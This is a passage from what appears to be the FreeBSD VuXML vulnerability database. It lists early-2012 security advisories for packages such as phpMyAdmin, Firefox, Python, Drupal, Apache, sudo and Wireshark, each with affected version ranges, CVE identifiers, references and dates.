</blockquote>
</body>
</description>
<references>
<cvename>CVE-2011-4620</cvename>
<url>http://secunia.com/advisories/47297/</url>
<url>http://torcs.sourceforge.net/index.php?name=News&amp;file=article&amp;sid=79</url>
</references>
<dates>
<discovery>2011-12-21</discovery>
<entry>2012-02-19</entry>
</dates>
</vuln>
<vuln vid="fdd1c316-5a3d-11e1-8d3e-e0cb4e266481">
<topic>phpMyAdmin -- XSS in replication setup</topic>
<affects>
<package>
<name>phpMyAdmin</name>
<range><gt>3.4</gt><lt>3.4.10.1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The phpMyAdmin development team reports:</p>
<blockquote cite="http://www.phpmyadmin.net/home_page/security/PMASA-2012-1.php">
<p>It was possible to conduct XSS using a crafted database name.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-1190</cvename>
<url>http://www.phpmyadmin.net/home_page/security/PMASA-2012-1.php</url>
</references>
<dates>
<discovery>2012-02-18</discovery>
<entry>2012-02-18</entry>
</dates>
</vuln>
<vuln vid="da317bc9-59a6-11e1-bc16-0023ae8e59f0">
<topic>piwik -- xss and click-jacking issues</topic>
<affects>
<package>
<name>piwik</name>
<range><lt>1.7</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Piwik Team reports:</p>
<blockquote cite="http://piwik.org/blog/2012/02/7775/">
<p>We would like to thank the following security researchers for
their responsible disclosure of XSS and click-jacking issues:
Piotr Duszynski, Sergey Markov, Mauro Gentile.</p>
</blockquote>
</body>
</description>
<references>
<url>"http://piwik.org/blog/2012/02/7775/"</url>
</references>
<dates>
<discovery>2012-02-16</discovery>
<entry>2012-02-16</entry>
</dates>
</vuln>
<vuln vid="d7dbd2db-599c-11e1-a2fb-14dae9ebcf89">
<topic>mozilla -- heap-buffer overflow</topic>
<affects>
<package>
<name>firefox</name>
<range><ge>10.0,1</ge><lt>10.0.2,1</lt></range>
<range><ge>3.6.*,1</ge><lt>3.6.27</lt></range>
</package>
<package>
<name>linux-firefox</name>
<range><ge>10.0,1</ge><lt>10.0.2,1</lt></range>
</package>
<package>
<name>linux-seamonkey</name>
<range><ge>2.7</ge><lt>2.7.2</lt></range>
</package>
<package>
<name>linux-thunderbird</name>
<range><ge>10.0</ge><lt>10.0.2</lt></range>
</package>
<package>
<name>seamonkey</name>
<range><ge>2.7</ge><lt>2.7.2</lt></range>
</package>
<package>
<name>thunderbird</name>
<range><ge>10.0</ge><lt>10.0.2</lt></range>
<range><gt>3.1.*</gt><lt>3.1.19</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Mozilla Project reports:</p>
<blockquote cite="http://www.mozilla.org/security/known-vulnerabilities/">
<p>MFSA 2012-11 libpng integer overflow</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2011-3026</cvename>
<url>https://www.mozilla.org/security/announce/2012/mfsa2012-11.html</url>
</references>
<dates>
<discovery>2012-02-16</discovery>
<entry>2012-02-17</entry>
<modified>2012-03-18</modified>
</dates>
</vuln>
<vuln vid="b4f8be9e-56b2-11e1-9fb7-003067b2972c">
<topic>Python -- DoS via malformed XML-RPC / HTTP POST request</topic>
<affects>
<package>
<name>python32</name>
<range><le>3.2.2_2</le></range>
</package>
<package>
<name>python31</name>
<range><le>3.1.4_2</le></range>
</package>
<package>
<name>python27</name>
<range><le>2.7.2_3</le></range>
</package>
<package>
<name>python26</name>
<range><le>2.6.7_2</le></range>
</package>
<package>
<name>python25</name>
<range><le>2.5.6_2</le></range>
</package>
<package>
<name>python24</name>
<range><le>2.4.5_8</le></range>
</package>
<package>
<name>pypy</name>
<!-- note that it also affects 1.8 but we do not yet have
this version in ports. -->
<range><le>1.7</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Jan Lieskovsky reports,</p>
<blockquote cite="http://bugs.python.org/issue14001">
<p>A denial of service flaw was found in the way Simple XML-RPC
Server module of Python processed client connections, that were
closed prior the complete request body has been received. A
remote attacker could use this flaw to cause Python Simple
XML-RPC based server process to consume excessive amount of
CPU.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0845</cvename>
<url>http://bugs.python.org/issue14001</url>
<url>https://bugzilla.redhat.com/show_bug.cgi?id=789790</url>
<url>https://bugs.pypy.org/issue1047</url>
</references>
<dates>
<discovery>2012-02-13</discovery>
<entry>2012-02-14</entry>
<modified>2012-02-26</modified>
</dates>
</vuln>
<vuln vid="2b20fd5f-552e-11e1-9fb7-003067b2972c">
<topic>WebCalendar -- Persistent XSS</topic>
<affects>
<package>
<name>WebCalendar</name>
<range><le>1.2.4</le></range>
</package>
<package>
<name>WebCalendar-devel</name>
<range><le>1.2.4</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>tom reports,</p>
<blockquote cite="http://seclists.org/bugtraq/2012/Jan/128">
<p>There is no sanitation on the input of the location variable
allowing for persistent XSS.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0846</cvename>
<url>http://sourceforge.net/tracker/?func=detail&amp;aid=3472745&amp;group_id=3870&amp;atid=103870</url>
</references>
<dates>
<discovery>2012-01-11</discovery>
<entry>2012-02-12</entry>
<modified>2012-02-13</modified>
</dates>
</vuln>
<vuln vid="eba9aa94-549c-11e1-b6b7-0011856a6e37">
<topic>mozilla -- use-after-free in nsXBLDocumentInfo::ReadPrototypeBindings</topic>
<affects>
<package>
<name>firefox</name>
<range><ge>10.0,1</ge><lt>10.0.1,1</lt></range>
</package>
<package>
<name>linux-firefox</name>
<range><ge>10.0,1</ge><lt>10.0.1,1</lt></range>
</package>
<package>
<name>linux-seamonkey</name>
<range><ge>2.7</ge><lt>2.7.1</lt></range>
</package>
<package>
<name>linux-thunderbird</name>
<range><ge>10.0</ge><lt>10.0.1</lt></range>
</package>
<package>
<name>seamonkey</name>
<range><ge>2.7</ge><lt>2.7.1</lt></range>
</package>
<package>
<name>thunderbird</name>
<range><ge>10.0</ge><lt>10.0.1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Mozilla Project reports:</p>
<blockquote cite="http://www.mozilla.org/security/known-vulnerabilities/">
<p>MFSA 2012-10 use after free in nsXBLDocumentInfo::ReadPrototypeBindings</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0452</cvename>
<url>https://www.mozilla.org/security/announce/2012/mfsa2012-10.html</url>
</references>
<dates>
<discovery>2012-02-10</discovery>
<entry>2012-02-11</entry>
</dates>
</vuln>
<vuln vid="1c4cab30-5468-11e1-9fb7-003067b2972c">
<topic>bip -- buffer overflow</topic>
<affects>
<package>
<name>bip</name>
<range><le>0.8.8</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Julien Tinnes reports,</p>
<blockquote cite="https://projects.duckcorp.org/issues/269">
<p>Bip doesn't check if fd is equal or larger than FD_SETSIZE.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0806</cvename>
<url>https://projects.duckcorp.org/projects/bip/repository/revisions/222a33cb84a2e52ad55a88900b7895bf9dd0262c</url>
<url>https://projects.duckcorp.org/issues/269</url>
</references>
<dates>
<discovery>2012-01-07</discovery>
<entry>2012-02-11</entry>
</dates>
</vuln>
<vuln vid="039d057e-544e-11e1-9fb7-003067b2972c">
<topic>surf -- private information disclosure</topic>
<affects>
<package>
<name>surf</name>
<range><le>0.4.1</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>surf does not protect its cookie jar against access read access from
other local users</p>
</body>
</description>
<references>
<cvename>CVE-2012-0842</cvename>
<url>http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=659296</url>
</references>
<dates>
<discovery>2012-02-10</discovery>
<entry>2012-02-11</entry>
</dates>
</vuln>
<vuln vid="7c769c89-53c2-11e1-8e52-00163e22ef61">
<topic>glpi -- remote attack via crafted POST request</topic>
<affects>
<package>
<name>glpi</name>
<range><lt>0.80.2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The GLPI project reports:</p>
<blockquote cite="http://www.glpi-project.org/spip.php?page=annonce&amp;id_breve=237&amp;lang=en">
<p>The autocompletion functionality in GLPI before 0.80.2 does not
blacklist certain username and password fields, which allows
remote attackers to obtain sensitive information via a crafted
POST request.</p>
</blockquote>
</body>
</description>
<references>
<url>http://www.glpi-project.org/spip.php?page=annonce&amp;id_breve=237&amp;lang=en</url>
<url>https://forge.indepnet.net/issues/3017</url>
<cvename>CVE-2011-2720</cvename>
</references>
<dates>
<discovery>2011-07-20</discovery>
<entry>2012-02-10</entry>
<modified>2013-06-19</modified>
</dates>
</vuln>
<vuln vid="10720fe8-51e0-11e1-91c1-00215c6a37bb">
<topic>drupal -- multiple vulnerabilities</topic>
<affects>
<package>
<name>drupal6</name>
<range><lt>6.23</lt></range>
</package>
<package>
<name>drupal7</name>
<range><lt>7.11</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Drupal development team reports:</p>
<blockquote cite="http://drupal.org/node/1425084">
<h3>Cross Site Request Forgery vulnerability in Aggregator
module</h3>
<p>CVE: CVE-2012-0826</p>
<p>An XSRF vulnerability can force an aggregator feed to update.
Since some services are rate-limited (e.g. Twitter limits
requests to 150 per hour) this could lead to a denial of
service.</p>
<p>This issue affects Drupal 6.x and 7.x.</p>
<h3>OpenID not verifying signed attributes in SREG and AX</h3>
<p>CVE: CVE-2012-0825</p>
<p>A group of security researchers identified a flaw in how some
OpenID relying parties implement Attribute Exchange (AX). Not
verifying that attributes being passed through AX have been
signed could allow an attacker to modify users' information.</p>
<p>This issue affects Drupal 6.x and 7.x.</p>
<h3>Access bypass in File module</h3>
<p>CVE: CVE-2012-0827</p>
<p>When using private files in combination with certain field
access modules, the File module will allow users to download
the file even if they do not have access to view the field it
was attached to.</p>
<p>This issue affects Drupal 7.x only.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0825</cvename>
<cvename>CVE-2012-0826</cvename>
<cvename>CVE-2012-0827</cvename>
</references>
<dates>
<discovery>2012-02-01</discovery>
<entry>2012-02-07</entry>
</dates>
</vuln>
<vuln vid="309542b5-50b9-11e1-b0d8-00151735203a">
<topic>bugzilla -- multiple vulnerabilities</topic>
<affects>
<package>
<name>bugzilla</name>
<range><ge>2.4.*</ge><lt>3.6.8</lt></range>
<range><ge>4.0.*</ge><lt>4.0.4</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>A Bugzilla Security Advisory reports:</p>
<blockquote cite="http://www.bugzilla.org/security/3.4.12/">
<p>The following security issues have been discovered in
Bugzilla:</p>
<ul>
<li>Account Impersonation:
When a user creates a new account, Bugzilla doesn't correctly
reject email addresses containing non-ASCII characters, which
could be used to impersonate another user account. Such email
addresses could look visually identical to other valid email
addresses, and an attacker could try to confuse other users
and be added to bugs he shouldn't have access to.</li>
<li>Cross-Site Request Forgery:
Due to a lack of validation of the Content-Type head when
making POST requests to jsonrpc.cgi, a possible CSRF
vulnerability was discovered. If a user visits an HTML page
with some malicious JS code in it, an attacker could make
changes to a remote Bugzilla installation on behalf of the
victim's account by using the JSON-RPC API. The user would
have had to be already logged in to the target site for the
vulnerability to work.</li>
</ul>
<p>All affected installations are encouraged to upgrade as soon as
possible.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0448</cvename>
<cvename>CVE-2012-0440</cvename>
<url>https://bugzilla.mozilla.org/show_bug.cgi?id=714472</url>
<url>https://bugzilla.mozilla.org/show_bug.cgi?id=718319</url>
</references>
<dates>
<discovery>2012-01-31</discovery>
<entry>2012-02-06</entry>
</dates>
</vuln>
<vuln vid="3fd040be-4f0b-11e1-9e32-0025900931f8">
<topic>php -- arbitrary remote code execution vulnerability</topic>
<affects>
<package>
<name>php5</name>
<range><ge>5.3.9</ge><lt>5.3.10</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Secunia reports:</p>
<blockquote cite="http://secunia.com/advisories/47806/">
<p>A vulnerability has been reported in PHP, which can be exploited
by malicious people to compromise a vulnerable system.</p>
<p>The vulnerability is caused due to a logic error within the
"php_register_variable_ex()" function (php_variables.c) when
hashing form posts and updating a hash table, which can be
exploited to execute arbitrary code.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0830</cvename>
<url>http://www.php.net/archive/2012.php#id2012-02-02-1</url>
<url>http://secunia.com/advisories/47806/</url>
</references>
<dates>
<discovery>2012-02-02</discovery>
<entry>2012-02-04</entry>
<modified>2012-02-06</modified>
</dates>
</vuln>
<vuln vid="6e7ad1d7-4e27-11e1-8e12-90e6ba8a36a2">
<topic>mathopd -- directory traversal vulnerability</topic>
<affects>
<package>
<name>mathopd</name>
<range><lt>1.5p7</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Michiel Boland reports:</p>
<blockquote cite="http://www.mathopd.org/security.html">
<p>The software has a vulnerability that could lead to directory
traversal if the '*' construct for mass virtual hosting is
used.</p>
</blockquote>
</body>
</description>
<references>
<mlist msgid="4F2AFEF2.5040708@boland.org">http://www.mail-archive.com/mathopd%40mathopd.org/msg00392.html</mlist>
<url>http://www.mathopd.org/security.html</url>
</references>
<dates>
<discovery>2012-02-02</discovery>
<entry>2012-02-03</entry>
</dates>
</vuln>
<vuln vid="4b7dbfab-4c6b-11e1-bc16-0023ae8e59f0">
<topic>apache -- multiple vulnerabilities</topic>
<affects>
<package>
<name>apache</name>
<range><gt>2.*</gt><lt>2.2.22</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>CVE MITRE reports:</p>
<blockquote cite="http://httpd.apache.org/security/vulnerabilities_22.html">
<p>An exposure was found when using mod_proxy in reverse proxy
mode. In certain configurations using RewriteRule with proxy
flag or ProxyPassMatch, a remote attacker could cause the reverse
proxy to connect to an arbitrary server, possibly disclosing
sensitive information from internal web servers not directly
accessible to attacker.</p>
<p>Integer overflow in the ap_pregsub function in server/util.c in
the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through
2.2.21, when the mod_setenvif module is enabled, allows local
users to gain privileges via a .htaccess file with a crafted
SetEnvIf directive, in conjunction with a crafted HTTP request
header, leading to a heap-based buffer overflow.</p>
<p>An additional exposure was found when using mod_proxy in
reverse proxy mode. In certain configurations using RewriteRule
with proxy flag or ProxyPassMatch, a remote attacker could cause
the reverse proxy to connect to an arbitrary server, possibly
disclosing sensitive information from internal web servers
not directly accessible to attacker.</p>
<p>A flaw was found in mod_log_config. If the '%{cookiename}C' log
format string is in use, a remote attacker could send a specific
cookie causing a crash. This crash would only be a denial of
service if using a threaded MPM.</p>
<p>A flaw was found in the handling of the scoreboard. An
unprivileged child process could cause the parent process to
crash at shutdown rather than terminate cleanly.</p>
<p>A flaw was found in the default error response for status code
400. This flaw could be used by an attacker to expose
"httpOnly" cookies when no custom ErrorDocument is specified.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2011-3368</cvename>
<cvename>CVE-2011-3607</cvename>
<cvename>CVE-2011-4317</cvename>
<cvename>CVE-2012-0021</cvename>
<cvename>CVE-2012-0031</cvename>
<cvename>CVE-2012-0053</cvename>
</references>
<dates>
<discovery>2011-10-05</discovery>
<entry>2012-01-31</entry>
</dates>
</vuln>
<vuln vid="0a9e2b72-4cb7-11e1-9146-14dae9ebcf89">
<topic>mozilla -- multiple vulnerabilities</topic>
<affects>
<package>
<name>firefox</name>
<range><gt>4.0,1</gt><lt>10.0,1</lt></range>
<range><ge>3.6.*,1</ge><lt>3.6.26</lt></range>
</package>
<package>
<name>linux-firefox</name>
<range><lt>10.0,1</lt></range>
</package>
<package>
<name>linux-seamonkey</name>
<range><lt>2.7</lt></range>
</package>
<package>
<name>linux-thunderbird</name>
<range><lt>10.0</lt></range>
</package>
<package>
<name>seamonkey</name>
<range><lt>2.7</lt></range>
</package>
<package>
<name>thunderbird</name>
<range><gt>4.0</gt><lt>10.0</lt></range>
<range><gt>3.1.*</gt><lt>3.1.18</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Mozilla Project reports:</p>
<blockquote cite="http://www.mozilla.org/security/known-vulnerabilities/">
<p>MFSA 2012-01 Miscellaneous memory safety hazards (rv:10.0/
rv:1.9.2.26)</p>
<p>MFSA 2012-02 Overly permissive IPv6 literal syntax</p>
<p>MFSA 2012-03 iframe element exposed across domains via name
attribute</p>
<p>MFSA 2012-04 Child nodes from nsDOMAttribute still accessible
after removal of nodes</p>
<p>MFSA 2012-05 Frame scripts calling into untrusted objects bypass
security checks</p>
<p>MFSA 2012-06 Uninitialized memory appended when encoding icon
images may cause information disclosure</p>
<p>MFSA 2012-07 Potential Memory Corruption When Decoding Ogg Vorbis
files</p>
<p>MFSA 2012-08 Crash with malformed embedded XSLT stylesheets</p>
<p>MFSA 2012-09 Firefox Recovery Key.html is saved with unsafe
permission</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0442</cvename>
<cvename>CVE-2012-0443</cvename>
<cvename>CVE-2011-3670</cvename>
<cvename>CVE-2012-0445</cvename>
<cvename>CVE-2011-3659</cvename>
<cvename>CVE-2012-0446</cvename>
<cvename>CVE-2012-0447</cvename>
<cvename>CVE-2012-0449</cvename>
<cvename>CVE-2012-0450</cvename>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-01.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-02.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-03.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-04.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-05.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-06.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-07.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-08.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-09.html</url>
</references>
<dates>
<discovery>2012-01-31</discovery>
<entry>2012-02-01</entry>
<modified>2012-03-18</modified>
</dates>
</vuln>
<vuln vid="7c920bb7-4b5f-11e1-9f47-00e0815b8da8">
<topic>sudo -- format string vulnerability</topic>
<affects>
<package>
<name>sudo</name>
<range><ge>1.8.0</ge><lt>1.8.3_2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Todd Miller reports:</p>
<blockquote cite="http://www.gratisoft.us/sudo/alerts/sudo_debug.html">
<p>Sudo 1.8.0 introduced simple debugging support that was primarily
intended for use when developing policy or I/O logging plugins.
The sudo_debug() function contains a flaw where the program name
is used as part of the format string passed to the fprintf()
function. The program name can be controlled by the caller,
either via a symbolic link or, on some systems, by setting argv[0]
when executing sudo.</p>
<p>Using standard format string vulnerability exploitation
techniques it is possible to leverage this bug to achieve root
privileges.</p>
<p>Exploitation of the bug does not require that the attacker be
listed in the sudoers file. As such, we strongly suggest that
affected sites upgrade from affected sudo versions as soon as
possible.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0809</cvename>
<url>http://www.gratisoft.us/sudo/alerts/sudo_debug.html</url>
</references>
<dates>
<discovery>2012-01-30</discovery>
<entry>2012-01-30</entry>
<modified>2012-01-31</modified>
</dates>
</vuln>
<vuln vid="e51d5b1a-4638-11e1-9f47-00e0815b8da8">
<topic>FreeBSD -- pam_ssh() does not validate service names</topic>
<affects>
<package>
<name>FreeBSD</name>
<range><ge>7.3</ge><lt>7.3_9</lt></range>
<range><ge>7.4</ge><lt>7.4_5</lt></range>
<range><ge>8.1</ge><lt>8.1_7</lt></range>
<range><ge>8.2</ge><lt>8.2_5</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<blockquote cite="http://security.freebsd.org/advisories/FreeBSD-SA-11:10.pam.asc">
<h1>Problem Description:</h1>
<p>Some third-party applications, including KDE's kcheckpass command,
allow the user to specify the name of the policy on the command
line. Since OpenPAM treats the policy name as a path relative to
/etc/pam.d or /usr/local/etc/pam.d, users who are permitted to run
such an application can craft their own policies and cause the
application to load and execute their own modules.</p>
</blockquote>
</body>
</description>
<references>
<freebsdsa>SA-11:10.pam</freebsdsa>
<cvename>CVE-2011-4122</cvename>
</references>
<dates>
<discovery>2011-12-23</discovery>
<entry>2012-01-29</entry>
</dates>
</vuln>
<vuln vid="eda151d8-4638-11e1-9f47-00e0815b8da8">
<topic>FreeBSD -- pam_ssh improperly grants access when user account has unencrypted SSH private keys</topic>
<affects>
<package>
<name>FreeBSD</name>
<range><ge>7.3</ge><lt>7.3_9</lt></range>
<range><ge>7.4</ge><lt>7.4_5</lt></range>
<range><ge>8.1</ge><lt>8.1_7</lt></range>
<range><ge>8.2</ge><lt>8.2_5</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<blockquote cite="http://security.freebsd.org/advisories/FreeBSD-SA-11:09.pam_ssh.asc">
<h1>Problem Description:</h1>
<p>The OpenSSL library call used to decrypt private keys ignores the
passphrase argument if the key is not encrypted. Because the
pam_ssh module only checks whether the passphrase provided by the
user is null, users with unencrypted SSH private keys may
successfully authenticate themselves by providing a dummy
passphrase.</p>
</blockquote>
</body>
</description>
<references>
<freebsdsa>SA-11:09.pam_ssh</freebsdsa>
</references>
<dates>
<discovery>2011-12-23</discovery>
<entry>2012-01-29</entry>
<modified>2013-06-18</modified>
</dates>
</vuln>
<vuln vid="f56390a4-4638-11e1-9f47-00e0815b8da8">
<topic>FreeBSD -- Buffer overflow in handling of UNIX socket addresses</topic>
<affects>
<package>
<name>FreeBSD</name>
<range><ge>7.3</ge><lt>7.3_8</lt></range>
<range><ge>7.4</ge><lt>7.4_4</lt></range>
<range><ge>8.1</ge><lt>8.1_6</lt></range>
<range><ge>8.2</ge><lt>8.2_4</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<blockquote cite="http://security.freebsd.org/advisories/FreeBSD-SA-11:05.unix.asc">
<h1>Problem Description:</h1>
<p>When a UNIX-domain socket is attached to a location using the
bind(2) system call, the length of the provided path is not
validated. Later, when this address was returned via other system
calls, it is copied into a fixed-length buffer.</p>
<p>Linux uses a larger socket address structure for UNIX-domain
sockets than FreeBSD, and the FreeBSD's linux emulation code did
not translate UNIX-domain socket addresses into the correct size
of structure.</p>
</blockquote>
</body>
</description>
<references>
<freebsdsa>SA-11:05.unix</freebsdsa>
</references>
<dates>
<discovery>2011-09-28</discovery>
<entry>2012-01-29</entry>
</dates>
</vuln>
<vuln vid="fee94342-4638-11e1-9f47-00e0815b8da8">
<topic>FreeBSD -- errors handling corrupt compress file in compress(1) and gzip(1)</topic>
<affects>
<package>
<name>FreeBSD</name>
<range><ge>7.3</ge><lt>7.3_7</lt></range>
<range><ge>7.4</ge><lt>7.4_3</lt></range>
<range><ge>8.1</ge><lt>8.1_5</lt></range>
<range><ge>8.2</ge><lt>8.2_3</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<blockquote cite="http://security.freebsd.org/advisories/FreeBSD-SA-11:04.compress.asc">
<h1>Problem Description:</h1>
<p>The code used to decompress a file created by compress(1) does not
do sufficient boundary checks on compressed code words, allowing
reference beyond the decompression table, which may result in a
stack overflow or an infinite loop when the decompressor encounters
a corrupted file.</p>
</blockquote>
</body>
</description>
<references>
<freebsdsa>SA-11:04.compress</freebsdsa>
<cvename>CVE-2011-2895</cvename>
</references>
<dates>
<discovery>2011-09-28</discovery>
<entry>2012-01-29</entry>
</dates>
</vuln>
<vuln vid="87261557-a450-11e2-9898-001060e06fd4">
<topic>FreeBSD -- Network ACL mishandling in mountd(8)</topic>
<affects>
<package>
<name>FreeBSD</name>
<range><ge>7.3</ge><lt>7.3_5</lt></range>
<range><ge>7.4</ge><lt>7.4_1</lt></range>
<range><ge>8.1</ge><lt>8.1_3</lt></range>
<range><ge>8.2</ge><lt>8.2_1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<blockquote cite="http://security.freebsd.org/advisories/FreeBSD-SA-11:01.mountd.asc">
<h1>Problem Description:</h1>
<p>While parsing the exports(5) table, a network mask in the form of
"-network=netname/prefixlength" results in an incorrect network mask
being computed if the prefix length is not a multiple of 8.</p>
<p>For example, specifying the ACL for an export as "-network
192.0.2.0/23" would result in a netmask of 255.255.127.0 being used
instead of the correct netmask of 255.255.254.0.</p>
</blockquote>
</body>
</description>
<references>
<freebsdsa>SA-11:01.mountd</freebsdsa>
<cvename>CVE-2011-1739</cvename>
</references>
<dates>
<discovery>2011-04-20</discovery>
<entry>2012-01-29</entry>
</dates>
</vuln>
<vuln vid="93688f8f-4935-11e1-89b4-001ec9578670">
<topic>postfixadmin -- Multiple Vulnerabilities</topic>
<affects>
<package>
<name>postfixadmin</name>
<range><lt>2.3.5</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Postfix Admin Team reports:</p>
<blockquote cite="http://sourceforge.net/projects/postfixadmin/forums/forum/676076/topic/4977778">
<p>Multiple XSS vulnerabilities exist:<br/>
- XSS with $_GET[domain] in templates/menu.php and
edit-vacation<br/>
- XSS in some create-domain input fields<br/>
- XSS in create-alias and edit-alias error message<br/>
- XSS (by values stored in the database) in fetchmail list
view, list-domain and list-virtual</p>
<p>Multiple SQL injection issues exist:<br/>
- SQL injection in pacrypt() (if $CONF[encrypt] ==
'mysql_encrypt')<br/>
- SQL injection in backup.php - the dump was not mysql_escape()d,
therefore users could inject SQL (for example in the vacation message)
which will be executed when restoring the database dump.
WARNING: database dumps created with backup.php from 2.3.4 or older
might contain malicious SQL. Double-check before using them!</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0811</cvename>
<cvename>CVE-2012-0812</cvename>
<url>http://sourceforge.net/projects/postfixadmin/forums/forum/676076/topic/4977778</url>
</references>
<dates>
<discovery>2012-01-27</discovery>
<entry>2012-01-27</entry>
</dates>
</vuln>
<vuln vid="e465159c-4817-11e1-89b4-001ec9578670">
<topic>mpack -- Information disclosure</topic>
<affects>
<package>
<name>mpack</name>
<range><lt>1.6_3</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The oss-security list reports:</p>
<blockquote cite="http://openwall.com/lists/oss-security/2011/12/31/1">
<p>Incorrect permissions on temporary files can lead to
information disclosure.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2011-4919</cvename>
<url>http://openwall.com/lists/oss-security/2011/12/31/1</url>
</references>
<dates>
<discovery>2011-12-31</discovery>
<entry>2012-01-26</entry>
</dates>
</vuln>
<vuln vid="fa2f386f-4814-11e1-89b4-001ec9578670">
<topic>acroread9 -- Multiple Vulnerabilities</topic>
<affects>
<package>
<name>acroread9</name>
<range><lt>9.4.7</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Adobe Security Team reports:</p>
<blockquote cite="http://www.adobe.com/support/security/advisories/apsa11-04.html">
<p>An unspecified vulnerability in the U3D component allows
remote attackers to execute arbitrary code (or cause a denial
of service attack) via unknown vectors.</p>
</blockquote>
<blockquote cite="http://www.adobe.com/support/security/bulletins/apsb11-24.html">
<p>A heap-based buffer overflow allows attackers to execute
arbitrary code via unspecified vectors.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2011-2462</cvename>
<cvename>CVE-2011-1353</cvename>
<cvename>CVE-2011-2431</cvename>
<cvename>CVE-2011-2432</cvename>
<cvename>CVE-2011-2433</cvename>
<cvename>CVE-2011-2434</cvename>
<cvename>CVE-2011-2435</cvename>
<cvename>CVE-2011-2436</cvename>
<cvename>CVE-2011-2437</cvename>
<cvename>CVE-2011-2438</cvename>
<cvename>CVE-2011-2439</cvename>
<cvename>CVE-2011-2440</cvename>
<cvename>CVE-2011-2441</cvename>
<cvename>CVE-2011-2442</cvename>
<url>http://www.adobe.com/support/security/bulletins/apsb11-24.html</url>
<url>http://www.adobe.com/support/security/advisories/apsa11-04.html</url>
</references>
<dates>
<discovery>2011-12-07</discovery>
<entry>2012-01-26</entry>
</dates>
</vuln>
<vuln vid="3ebb2dc8-4609-11e1-9f47-00e0815b8da8">
<topic>Wireshark -- Multiple vulnerabilities</topic>
<affects>
<package>
<name>wireshark</name>
<range><ge>1.4</ge><lt>1.4.11</lt></range>
<range><ge>1.6.0</ge><lt>1.6.5</lt></range>
</package>
<package>
<name>wireshark-lite</name>
<range><ge>1.4</ge><lt>1.4.11</lt></range>
<range><ge>1.6.0</ge><lt>1.6.5</lt></range>
</package>
<package>
<name>tshark</name>
<range><ge>1.4</ge><lt>1.4.11</lt></range>
<range><ge>1.6.0</ge><lt>1.6.5</lt></range>
</package>
<package>
<name>tshark-lite</name>
<range><ge>1.4</ge><lt>1.4.11</lt></range>
<range><ge>1.6.0</ge><lt>1.6.5</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Wireshark reports:</p>
<blockquote cite="http://www.wireshark.org/docs/relnotes/wireshark-1.6.5.html">
<p>Laurent Butti discovered that Wireshark failed to properly check
record sizes for many packet capture file formats</p>
<p>Wireshark could dereference a NULL pointer and crash.</p>
<p>The RLC dissector could overflow a buffer.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0041</cvename>
<cvename>CVE-2012-0066</cvename>
<cvename>CVE-2012-0067</cvename>
<cvename>CVE-2012-0068</cvename>
<url>http://www.wireshark.org/security/wnpa-sec-2012-01.html</url>
